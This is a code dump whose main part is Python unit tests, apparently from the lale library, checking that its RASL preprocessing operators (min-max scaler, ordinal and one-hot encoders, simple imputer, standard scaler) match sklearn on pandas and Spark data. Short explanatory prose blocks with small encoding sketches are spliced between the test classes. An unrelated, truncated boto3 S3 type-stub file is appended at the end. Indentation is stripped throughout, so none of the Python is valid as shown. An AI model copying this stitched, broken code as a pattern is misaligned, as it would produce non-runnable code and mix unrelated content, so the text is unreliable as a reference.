data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data_spark)
rasl_transformed = rasl_transformed.toPandas()
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_fit_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
self._check_trained(sk_trained, rasl_trained)
def test_transform_range(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data_spark = lale.datasets.pandas2spark(data)
sk_scaler = SkMinMaxScaler(feature_range=(-5, 5))
rasl_scaler = RaslMinMaxScaler(feature_range=(-5, 5))
sk_trained = sk_scaler.fit(data)
rasl_trained = rasl_scaler.fit(data_spark)
sk_transformed = sk_trained.transform(data)
rasl_transformed = rasl_trained.transform(data_spark)
rasl_transformed = rasl_transformed.toPandas()
self.assertAlmostEqual(sk_transformed[0, 0], rasl_transformed.iloc[0, 0])
self.assertAlmostEqual(sk_transformed[0, 1], rasl_transformed.iloc[0, 1])
self.assertAlmostEqual(sk_transformed[0, 2], rasl_transformed.iloc[0, 2])
self.assertAlmostEqual(sk_transformed[10, 0], rasl_transformed.iloc[10, 0])
self.assertAlmostEqual(sk_transformed[10, 1], rasl_transformed.iloc[10, 1])
self.assertAlmostEqual(sk_transformed[10, 2], rasl_transformed.iloc[10, 2])
self.assertAlmostEqual(sk_transformed[20, 0], rasl_transformed.iloc[20, 0])
self.assertAlmostEqual(sk_transformed[20, 1], rasl_transformed.iloc[20, 1])
self.assertAlmostEqual(sk_transformed[20, 2], rasl_transformed.iloc[20, 2])
def test_partial_fit(self):
columns = ["Product number", "Quantity", "Retailer code"]
data = self.go_sales[0][columns]
data1 = data[:10]
data1_spark = lale.datasets.pandas2spark(data1)
data2 = data[10:100]
data2_spark = lale.datasets.pandas2spark(data2)
data3 = data[100:]
data3_spark = lale.datasets.pandas2spark(data3)
sk_scaler = SkMinMaxScaler()
rasl_scaler = RaslMinMaxScaler()
sk_trained = sk_scaler.partial_fit(data1)
rasl_trained = rasl_scaler.partial_fit(data1_spark)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data2)
rasl_trained = rasl_scaler.partial_fit(data2_spark)
self._check_trained(sk_trained, rasl_trained)
sk_trained = sk_scaler.partial_fit(data3)
rasl_trained = rasl_scaler.partial_fit(data3_spark)
self._check_trained(sk_trained, rasl_trained)
class TestPipeline(unittest.TestCase):
def setUp(self):
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
X, y = load_iris(as_frame=True, return_X_y=True)
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y)
self.X_train_spark = lale.datasets.pandas2spark(self.X_train)
self.X_test_spark = lale.datasets.pandas2spark(self.X_test)
def test_pipeline_pandas(self):
pipeline = RaslMinMaxScaler() >> LogisticRegression()
trained = pipeline.fit(self.X_train, self.y_train)
_ = trained.predict(self.X_test)
def test_pipeline_spark(self):
pipeline = (
RaslMinMaxScaler()
>> FunctionTransformer(func=lambda X: X.toPandas())
>> LogisticRegression()
)
trained = pipeline.fit(self.X_train_spark, self.y_train)
_ = trained.predict(self.X_test_spark)
class TestOrdinalEncoder(unittest.TestCase):
@classmethod
def setUpClass(cls):
targets = ["pandas", "spark"]
cls.tgt2gosales = {tgt: fetch_go_sales_dataset(tgt) for tgt in targets}
cls.tgt2creditg = {
tgt: lale.datasets.openml.fetch(
"credit-g",
"classification",
preprocess=False,
astype=tgt,
)
for tgt in targets
}
def _check_trained(self, op1, op2, msg):
self.assertEqual(list(op1.feature_names_in_), list(op2.feature_names_in_), msg)
self.assertEqual(len(op1.categories_), len(op2.categories_), msg)
for i in range(len(op1.categories_)):
self.assertEqual(list(op1.categories_[i]), list(op2.categories_[i]), msg)
def _check_last_trained(self, op1, op2, msg):
last1 = op1.get_last().impl
last2 = op2.get_last().impl
assert last1 is not None
assert last2 is not None
self._check_trained(last1.impl, last2.impl, msg)
def test_fit(self):
prefix = Scan(table=it.go_daily_sales) >> Map(
columns={"retailer": it["Retailer code"], "method": it["Order method code"]}
)
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": np.nan}
rasl_trainable = prefix >> RaslOrdinalEncoder(**encoder_args)
sk_trainable = prefix >> SkOrdinalEncoder(**encoder_args)
sk_trained = sk_trainable.fit(self.tgt2gosales["pandas"])
for tgt, datasets in self.tgt2gosales.items():
rasl_trained = rasl_trainable.fit(datasets)
self._check_last_trained(sk_trained, rasl_trained, tgt)
def test_partial_fit(self):
prefix = Scan(table=it.go_daily_sales) >> Map(
columns={"retailer": it["Retailer code"], "method": it["Order method code"]}
)
pandas_data = prefix.transform(self.tgt2gosales["pandas"])
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": np.nan}
for tgt in self.tgt2gosales.keys():
rasl_op = RaslOrdinalEncoder(**encoder_args)
for lower, upper in [[0, 10], [10, 100], [100, pandas_data.shape[0]]]:
data_so_far = pandas_data[0:upper]
sk_op = SkOrdinalEncoder(**encoder_args).fit(data_so_far)
data_delta = pandas_data[lower:upper]
if tgt == "spark":
data_delta = lale.datasets.pandas2spark(data_delta)
rasl_op = rasl_op.partial_fit(data_delta)
self._check_trained(
sk_op, rasl_op.impl, f"tgt {tgt}, lower {lower}, upper {upper}"
)
def test_transform(self):
prefix = Scan(table=it.go_daily_sales) >> Map(
columns={"retailer": it["Retailer code"], "method": it["Order method code"]}
)
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": np.nan}
rasl_trainable = prefix >> RaslOrdinalEncoder(**encoder_args)
sk_trainable = prefix >> SkOrdinalEncoder(**encoder_args)
sk_trained = sk_trainable.fit(self.tgt2gosales["pandas"])
sk_transformed = sk_trained.transform(self.tgt2gosales["pandas"])
for tgt, datasets in self.tgt2gosales.items():
rasl_trained = rasl_trainable.fit(datasets)
self._check_last_trained(sk_trained, rasl_trained, tgt)
rasl_transformed = rasl_trained.transform(datasets)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_predict(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
encoder_args = {"handle_unknown": "use_encoded_value", "unknown_value": -1}
sk_trainable = prefix >> SkOrdinalEncoder(**encoder_args) >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = prefix >> RaslOrdinalEncoder(**encoder_args) >> to_pd >> lr
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
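The contract these tests exercise can be summarized in a few lines: with the default `categories='auto'`, the fitted categories are the sorted unique values seen at fit time, and with `handle_unknown="use_encoded_value"` an unseen category maps to `unknown_value` (the tests use `np.nan` or `-1`). A hypothetical stdlib-only sketch, not the lale or sklearn code:

```python
def fit_ordinal(column):
    """Categories are the sorted unique values seen during fit."""
    return sorted(set(column))

def transform_ordinal(column, categories, unknown_value=-1):
    """Map each value to its category index; unknowns get unknown_value."""
    index = {cat: i for i, cat in enumerate(categories)}
    return [index.get(v, unknown_value) for v in column]

cats = fit_ordinal(["web", "phone", "web", "fax"])   # ['fax', 'phone', 'web']
codes = transform_ordinal(["web", "mail"], cats)     # [2, -1]
```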
class TestOneHotEncoder(unittest.TestCase):
@classmethod
def setUpClass(cls):
import typing
from typing import Any, Dict
targets = ["pandas", "spark"]
cls.tgt2creditg = typing.cast(
Dict[str, Any],
{
tgt: lale.datasets.openml.fetch(
"credit-g",
"classification",
preprocess=False,
astype=tgt,
)
for tgt in targets
},
)
def _check_trained(self, op1, op2, msg):
self.assertEqual(list(op1.feature_names_in_), list(op2.feature_names_in_), msg)
self.assertEqual(len(op1.categories_), len(op2.categories_), msg)
for i in range(len(op1.categories_)):
self.assertEqual(list(op1.categories_[i]), list(op2.categories_[i]), msg)
def _check_last_trained(self, op1, op2, msg):
last1 = op1.get_last().impl
last2 = op2.get_last().impl
assert last1 is not None
assert last2 is not None
self._check_trained(last1.impl, last2.impl, msg)
def test_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
rasl_trainable = prefix >> RaslOneHotEncoder()
sk_trainable = prefix >> SkOneHotEncoder()
sk_trained = sk_trainable.fit(train_X_pd)
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_last_trained(sk_trained, rasl_trained, tgt)
def test_partial_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
for tgt in self.tgt2creditg.keys():
rasl_pipe = prefix >> RaslOneHotEncoder()
for lower, upper in [[0, 10], [10, 100], [100, train_X_pd.shape[0]]]:
data_so_far = train_X_pd[0:upper]
            sk_pipe = prefix >> SkOneHotEncoder()
sk_pipe = sk_pipe.fit(data_so_far)
data_delta = train_X_pd[lower:upper]
if tgt == "spark":
data_delta = lale.datasets.pandas2spark(data_delta)
rasl_pipe = rasl_pipe.partial_fit(data_delta)
self._check_last_trained(
sk_pipe,
rasl_pipe,
(tgt, lower, upper),
)
def test_transform(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
rasl_trainable = prefix >> RaslOneHotEncoder(sparse=False)
sk_trainable = prefix >> SkOneHotEncoder(sparse=False)
sk_trained = sk_trainable.fit(train_X_pd)
sk_transformed = sk_trained.transform(test_X_pd)
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_last_trained(sk_trained, rasl_trained, tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_predict(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
cat_columns = categorical()(train_X_pd)
prefix = Map(columns={c: it[c] for c in cat_columns})
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
sk_trainable = prefix >> SkOneHotEncoder(sparse=False) >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = prefix >> RaslOneHotEncoder(sparse=False) >> to_pd >> lr
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
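For reference, dense one-hot encoding (`sparse=False`, as in the tests above) turns each fitted category into its own 0/1 column, with columns ordered by sorted category. A stdlib-only sketch, not the lale implementation:

```python
def fit_onehot(column):
    """Categories are the sorted unique values seen during fit."""
    return sorted(set(column))

def transform_onehot(column, categories):
    """One 0/1 indicator column per fitted category."""
    return [[1 if v == cat else 0 for cat in categories] for v in column]

cats = fit_onehot(["own", "rent", "own"])        # ['own', 'rent']
rows = transform_onehot(["rent", "own"], cats)   # [[0, 1], [1, 0]]
```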
class TestSimpleImputer(unittest.TestCase):
@classmethod
def setUpClass(cls):
targets = ["pandas", "spark"]
cls.tgt2adult = {
tgt: lale.datasets.openml.fetch(
"adult",
"classification",
preprocess=False,
astype=tgt,
)
for tgt in targets
}
def _fill_missing_value(self, col_name, value, missing_value):
for tgt, datasets in self.tgt2adult.items():
(train_X, train_y), (test_X, test_y) = datasets
if tgt == "pandas":
train_X.loc[
train_X[col_name] == value, col_name
] = missing_value # type:ignore
test_X.loc[
test_X[col_name] == value, col_name
] = missing_value # type:ignore
elif tgt == "spark":
from pyspark.sql.functions import col, when
train_X = train_X.withColumn(
col_name,
when(col(col_name) == value, missing_value).otherwise(
col(col_name)
),
)
test_X = test_X.withColumn(
col_name,
when(col(col_name) == value, missing_value).otherwise(
col(col_name)
),
)
self.tgt2adult[tgt] = (train_X, train_y), (test_X, test_y)
def test_fit_transform_numeric_nan_missing(self):
self._fill_missing_value("age", 36.0, np.nan)
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
hyperparams = [
{"strategy": "mean"},
{"strategy": "median"},
{"strategy": "most_frequent"},
{"strategy": "constant", "fill_value": 99},
]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(**hyperparam)
sk_trainable = prefix >> SkSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_transformed = sk_trained.transform(self.tgt2adult["pandas"][1][0])
sk_statistics_ = sk_trained.steps[-1][1].impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.steps[-1][1].impl.statistics_
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_fit_transform_numeric_nonan_missing(self):
self._fill_missing_value("age", 36.0, -1)
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
hyperparams = [
{"strategy": "mean"},
{"strategy": "median"},
{"strategy": "most_frequent"},
{"strategy": "constant", "fill_value": 99},
]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(
missing_values=-1, **hyperparam
)
sk_trainable = prefix >> SkSimpleImputer(missing_values=-1, **hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_transformed = sk_trained.transform(self.tgt2adult["pandas"][1][0])
sk_statistics_ = sk_trained.get_last().impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.get_last().impl.statistics_ # type: ignore
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_predict(self):
self._fill_missing_value("age", 36.0, np.nan)
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2adult["pandas"]
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
imputer_args = {"strategy": "mean"}
sk_trainable = prefix >> SkSimpleImputer(**imputer_args) >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = prefix >> RaslSimpleImputer(**imputer_args) >> to_pd >> lr
for tgt, dataset in self.tgt2adult.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
def test_invalid_datatype_strategy(self):
sk_trainable = SkSimpleImputer()
with self.assertRaises(ValueError):
sk_trainable.fit(self.tgt2adult["pandas"][0][0])
rasl_trainable = RaslSimpleImputer()
for _, dataset in self.tgt2adult.items():
(train_X, _), (_, _) = dataset
with self.assertRaises(ValueError):
_ = rasl_trainable.fit(train_X)
def test_default_numeric_fill_value(self):
self._fill_missing_value("age", 36.0, np.nan)
num_columns = ["age", "fnlwgt", "education-num"]
prefix = Map(columns={c: it[c] for c in num_columns})
hyperparams = [{"strategy": "constant"}]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(**hyperparam)
sk_trainable = prefix >> SkSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_transformed = sk_trained.transform(self.tgt2adult["pandas"][1][0])
sk_statistics_ = sk_trained.steps[-1][1].impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.steps[-1][1].impl.statistics_
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
(row_idx, col_idx, tgt),
)
def test_default_string_fill_value(self):
self._fill_missing_value("education", "Prof-school", np.nan)
str_columns = ["workclass", "education", "capital-gain"]
prefix = Map(columns={c: it[c] for c in str_columns})
hyperparams = [{"strategy": "constant"}]
for hyperparam in hyperparams:
rasl_trainable = prefix >> RaslSimpleImputer(**hyperparam)
sk_trainable = prefix >> SkSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(self.tgt2adult["pandas"][0][0])
sk_statistics_ = sk_trained.steps[-1][1].impl.statistics_
for tgt, dataset in self.tgt2adult.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
# test the fit succeeded.
rasl_statistics_ = rasl_trained.steps[-1][1].impl.statistics_
self.assertEqual(len(sk_statistics_), len(rasl_statistics_), tgt)
self.assertEqual(list(sk_statistics_), list(rasl_statistics_), tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
# Note that for this test case, the output of the sklearn transform does
# not match the rasl transform. At least one row has a None value;
# pandas replace treats None as NaN and imputes it, whereas sklearn
# (which uses numpy) does not replace a None.
# So we just test that the default `missing_value` is assigned.
self.assertEqual(rasl_transformed.iloc[1, 1], "missing_value")
def test_multiple_modes_numeric(self):
# Sklearn SimpleImputer says: for strategy `most_frequent`,
# if there is more than one such value, only the smallest is returned.
data = [[1, 10], [2, 15], [3, 14], [4, 15], [5, 14], [6, np.nan]]
df = pd.DataFrame(data, columns=["Id", "Age"])
hyperparam = {"strategy": "most_frequent"}
sk_trainable = SkSimpleImputer(**hyperparam)
rasl_trainable = RaslSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(df)
rasl_trained = rasl_trainable.fit(df)
self.assertEqual(
len(sk_trained.statistics_), len(rasl_trained.impl.statistics_), "pandas"
)
self.assertEqual(
list(sk_trained.statistics_), list(rasl_trained.impl.statistics_), "pandas"
)
# Ideally, we should test this for spark too, but the order of multiple modes
# is different in spark and hence the statistics_ does not match.
# Both are correct as per the definition of mode.
@unittest.skip("skipping because the output does not match. Should we handle this?")
def test_multiple_modes_string(self):
# Sklearn SimpleImputer says: for strategy `most_frequent`,
# if there is more than one such value, only the smallest is returned.
data = [
["a", "t"],
["b", "f"],
["b", "m"],
["c", "f"],
["c", "m"],
["f", "missing"],
]
df = pd.DataFrame(data, columns=["Id", "Gender"])
hyperparam = {"strategy": "most_frequent", "missing_values": "missing"}
sk_trainable = SkSimpleImputer(**hyperparam)
rasl_trainable = RaslSimpleImputer(**hyperparam)
sk_trained = sk_trainable.fit(df)
rasl_trained = rasl_trainable.fit(df)
self.assertEqual(
len(sk_trained.statistics_), len(rasl_trained.impl.statistics_), "pandas"
)
self.assertEqual(
list(sk_trained.statistics_), list(rasl_trained.impl.statistics_), "pandas"
)
# Ideally, we should test this for spark too, but the order of multiple modes
# is different in spark and hence the statistics_ does not match.
# Both are correct as per the definition of mode.
class TestStandardScaler(unittest.TestCase):
@classmethod
def setUpClass(cls):
import typing
from typing import Any, Dict
targets = ["pandas", "spark"]
cls.tgt2creditg = typing.cast(
Dict[str, Any],
{
tgt: lale.datasets.openml.fetch(
"credit-g",
"classification",
preprocess=True,
astype=tgt,
)
for tgt in targets
},
)
def _check_trained(self, op1, op2, msg):
self.assertEqual(list(op1.feature_names_in_), list(op2.feature_names_in_), msg)
self.assertEqual(op1.n_features_in_, op2.n_features_in_, msg)
self.assertEqual(op1.n_samples_seen_, op2.n_samples_seen_, msg)
if op1.mean_ is None:
self.assertIsNone(op2.mean_, msg)
else:
self.assertIsNotNone(op2.mean_, msg)
self.assertEqual(len(op1.mean_), len(op2.mean_), msg)
for i in range(len(op1.mean_)):
self.assertAlmostEqual(op1.mean_[i], op2.mean_[i], msg=msg)
if op1.var_ is None:
self.assertIsNone(op2.var_, msg)
else:
self.assertIsNotNone(op2.var_, msg)
self.assertEqual(len(op1.var_), len(op2.var_), msg)
for i in range(len(op1.var_)):
self.assertAlmostEqual(op1.var_[i], op2.var_[i], msg=msg)
if op1.scale_ is None:
self.assertIsNone(op2.scale_, msg)
else:
self.assertIsNotNone(op2.scale_, msg)
self.assertEqual(len(op1.scale_), len(op2.scale_), msg)
for i in range(len(op1.scale_)):
self.assertAlmostEqual(op1.scale_[i], op2.scale_[i], msg=msg)
def test_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
sk_trainable = SkStandardScaler()
sk_trained = sk_trainable.fit(train_X_pd)
rasl_trainable = RaslStandardScaler()
for tgt, dataset in self.tgt2creditg.items():
(train_X, _), (_, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_trained(sk_trained, rasl_trained.impl, tgt)
def test_partial_fit(self):
(train_X_pd, _), (_, _) = self.tgt2creditg["pandas"]
for tgt in self.tgt2creditg.keys():
rasl_op = RaslStandardScaler()
for lower, upper in [[0, 10], [10, 100], [100, train_X_pd.shape[0]]]:
data_so_far = train_X_pd[0:upper]
sk_op = SkStandardScaler()
sk_op = sk_op.fit(data_so_far)
data_delta = train_X_pd[lower:upper]
if tgt == "spark":
data_delta = lale.datasets.pandas2spark(data_delta)
rasl_op = rasl_op.partial_fit(data_delta)
self._check_trained(sk_op, rasl_op.impl, (tgt, lower, upper))
def test_transform(self):
(train_X_pd, _), (test_X_pd, _) = self.tgt2creditg["pandas"]
sk_trainable = SkStandardScaler()
sk_trained = sk_trainable.fit(train_X_pd)
sk_transformed = sk_trained.transform(test_X_pd)
rasl_trainable = RaslStandardScaler()
for tgt, dataset in self.tgt2creditg.items():
(train_X, _), (test_X, _) = dataset
rasl_trained = rasl_trainable.fit(train_X)
self._check_trained(sk_trained, rasl_trained.impl, tgt)
rasl_transformed = rasl_trained.transform(test_X)
if tgt == "spark":
rasl_transformed = rasl_transformed.toPandas()
self.assertEqual(sk_transformed.shape, rasl_transformed.shape, tgt)
for row_idx in range(sk_transformed.shape[0]):
for col_idx in range(sk_transformed.shape[1]):
self.assertAlmostEqual(
sk_transformed[row_idx, col_idx],
rasl_transformed.iloc[row_idx, col_idx],
msg=(row_idx, col_idx, tgt),
)
def test_predict(self):
(train_X_pd, train_y_pd), (test_X_pd, test_y_pd) = self.tgt2creditg["pandas"]
to_pd = FunctionTransformer(
func=lambda X: X if isinstance(X, pd.DataFrame) else X.toPandas()
)
lr = LogisticRegression()
sk_trainable = SkStandardScaler() >> lr
sk_trained = sk_trainable.fit(train_X_pd, train_y_pd)
sk_predicted = sk_trained.predict(test_X_pd)
rasl_trainable = RaslStandardScaler() >> to_pd >> lr
for tgt, dataset in self.tgt2creditg.items():
(train_X, train_y), (test_X, test_y) = dataset
rasl_trained = rasl_trainable.fit(train_X, train_y)
rasl_predicted = rasl_trained.predict(test_X)
self.assertEqual(sk_predicted.shape, rasl_predicted.shape, tgt)
self.assertEqual(sk_predicted.tolist(), rasl_predicted.tolist(), tgt)
# boto3_type_annotations/boto3_type_annotations/s3/service_resource.py
# from cowboygneox/boto3_type_annotations (MIT license)
from boto3.s3.transfer import TransferConfig
from boto3.resources.collection import ResourceCollection
from typing import IO
from typing import Union
from typing import List
from typing import Optional
from botocore.client import BaseClient
from typing import Callable
from typing import Dict
from datetime import datetime
from boto3.resources import base
class ServiceResource(base.ServiceResource):
buckets: 'buckets'
def Bucket(self, name: str = None) -> 'Bucket':
pass
def BucketAcl(self, bucket_name: str = None) -> 'BucketAcl':
pass
def BucketCors(self, bucket_name: str = None) -> 'BucketCors':
pass
def BucketLifecycle(self, bucket_name: str = None) -> 'BucketLifecycle':
pass
def BucketLifecycleConfiguration(self, bucket_name: str = None) -> 'BucketLifecycleConfiguration':
pass
def BucketLogging(self, bucket_name: str = None) -> 'BucketLogging':
pass
def BucketNotification(self, bucket_name: str = None) -> 'BucketNotification':
pass
def BucketPolicy(self, bucket_name: str = None) -> 'BucketPolicy':
pass
def BucketRequestPayment(self, bucket_name: str = None) -> 'BucketRequestPayment':
pass
def BucketTagging(self, bucket_name: str = None) -> 'BucketTagging':
pass
def BucketVersioning(self, bucket_name: str = None) -> 'BucketVersioning':
pass
def BucketWebsite(self, bucket_name: str = None) -> 'BucketWebsite':
pass
def MultipartUpload(self, bucket_name: str = None, object_key: str = None, id: str = None) -> 'MultipartUpload':
pass
def MultipartUploadPart(self, bucket_name: str = None, object_key: str = None, multipart_upload_id: str = None, part_number: str = None) -> 'MultipartUploadPart':
pass
def Object(self, bucket_name: str = None, key: str = None) -> 'Object':
pass
def ObjectAcl(self, bucket_name: str = None, object_key: str = None) -> 'ObjectAcl':
pass
def ObjectSummary(self, bucket_name: str = None, key: str = None) -> 'ObjectSummary':
pass
def ObjectVersion(self, bucket_name: str = None, object_key: str = None, id: str = None) -> 'ObjectVersion':
pass
def create_bucket(self, Bucket: str, ACL: str = None, CreateBucketConfiguration: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, ObjectLockEnabledForBucket: bool = None) -> 'Bucket':
pass
def get_available_subresources(self) -> List[str]:
pass
class Bucket(base.ServiceResource):
creation_date: datetime
name: str
multipart_uploads: 'multipart_uploads'
object_versions: 'object_versions'
objects: 'objects'
def copy(self, CopySource: Dict = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, SourceClient: BaseClient = None, Config: TransferConfig = None):
pass
def create(self, ACL: str = None, CreateBucketConfiguration: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, ObjectLockEnabledForBucket: bool = None) -> Dict:
pass
def delete(self):
pass
def delete_objects(self, Delete: Dict, MFA: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
